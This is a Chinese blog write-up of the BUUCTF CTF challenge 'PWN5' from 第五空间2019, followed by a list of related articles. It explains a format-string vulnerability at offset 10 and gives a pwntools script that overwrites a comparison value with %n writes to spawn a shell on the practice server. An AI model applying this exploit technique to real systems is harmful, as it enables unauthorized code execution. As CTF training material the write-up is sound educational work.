BUUCTF 第五空间2019PWN5

最新推荐文章于 2024-04-11 16:24:58 发布
最新推荐文章于 2024-04-11 16:24:58 发布
阅读量2k 收藏
点赞数
分类专栏: BUUCTF 文章标签: linux 安全 pwn python c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arraylocalhost/article/details/124372008
版权

1.checksec+运行

32位/NX保护/canary保护

2.IDA进行中

1.main()函数

printf()函数 考虑格式化字符串漏洞

 通过0x61616161可以确定参数在第10个位置上

if ( atoi(nptr) == dword_804C044 )
  {
    puts("ok!!");
    system("/bin/sh");
  }

如何拿到binsh程序也给出了

直接利用格式化字符串改写unk_804C044之中的数据,然后输入数据对比得到shell

跟进dword_804C044看看是什么情况

 

0x48-0x44

0x804c044/0x804c045/ 0x804c046/0x804c047

需要修改具体四个位置

对应的

%10$n%11$n%12$n%13$n

3.脚本

from pwn import*
#p=process('./8pwn5')
p=remote("node4.buuoj.cn",25682)
payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047)
payload+=b'%10$n%11$n%12$n%13$n'

p.sendline(payload)
p.sendline(str(0x10101010))//交互需要发送四字节字符串
p.interactive()

Rt1Text
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[ctfhub.pwn] 第12-14题
weixin_52640415的博客
09-06 683
ctfhub.pwn习题集
[第五空间2019 决赛]PWN5
weixin_56301399的博客
07-21 1528
格式化字符串漏洞
Buuctf第五空间决赛2024]pwn5
最新发布
2401_83974345的博客
04-11 793
发现为32位2.ida32反编译从 /dev/urandom 中读取了四个字节的随机数,将其存储数据到unk_804c044所指向的内存,然后要求用户输入name和passwd。用户输入name后,它会直接将输入内容输出到屏幕上,然后要求用户输入passwd。程序将尝试将用户输入的passwd转换为整数,如果与之前生成的随机数相等,则输出"ok!!“并调用 /bin/sh执行 shell;否则输出"fail”发现存在格式化字符串漏洞3.“访问”构造Python脚本偏移量为10)
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1382
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
BUUCTF--第五空间决赛pwn5
sandyyyz的博客
10-13 406
给和我一样的pwn新手参考的一次简单的格式化字符串漏洞题解析过程
BUUCTF-pwn(5)
njh18790816639的博客
11-25 397
jarvisoj_level4 简单的ret2libc! from pwn import * from LibcSearcher import * context(log_level='debug',os='linux',arch='i386') r = remote('node4.buuoj.cn',25768) #r = process('./level4') elf = ELF('./level4') main = elf.symbols['main'] write_plt = elf.plt['
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
[每日一PWN]BUUCTF PWN5
qq_55233040的博客
11-28 351
遇到了buu的pwn题中按顺序的第一道格式化字符串漏洞的题目,难度稍有提升。
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串】
qq_73149934的博客
12-10 789
BUUCTF--pwn--[第五空间2019 决赛]PWN5
buuctf pwn(5~8)
cainiao78777的博客
12-04 241
buuctf pwn (5~8)
[BUUCTF]-PWN:[第五空间2019 决赛]PWN5解析
2301_79326813的博客
12-14 326
这里之所以能这样利用是利用了动态链接的延迟绑定,当函数第一次调用时会把该函数真正的地址写入got表内,之后的调用都会从got表内存的地址去调用,大致是plt->got->addr,atoi的plt表里存的是atoi的got地址,atoi的got里存的是atoi在程序中的真正地址,我们修改atoi的got的内容,那他在调用atoi的plt时就会直接调用system的plt,system的plt就会调用system的got,从而实现调用system函数。这里有大致有两种思路,都运用了格式化字符串漏洞。
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2000
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
pwn】[第五空间2019 决赛]PWN5
ethan18的博客
07-13 239
函数的逻辑(就是上面那个伪代码),可以看出,主要是需要让我们的passwd输入值和从文件中输入的值保持相同,但是很明显我们根本就不知道这个。可以数出,0x41414141是格式化字符串的第10个参数,所以我们构造的时候就需要从。这是Buuctf的一道题,是我实战遇到的第一道格式字符串漏洞,在此记录。对于格式化字符串漏洞,我们首先要确定输入点是栈中的第几个参数。函数里面直接输入了地址,表明是有格式字符串漏洞的。,我们一个字节一个字节的存入,所以不能是直接用。,将输出的字符串的数量覆盖进所指向的位置。
2021 rois暑假集训——栈溢出与简单的rop链(buuctf练习)
weixin_56780239的博客
08-07 1180
2021年暑假参加集训,在buuctf上做的几道题的writeup.
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值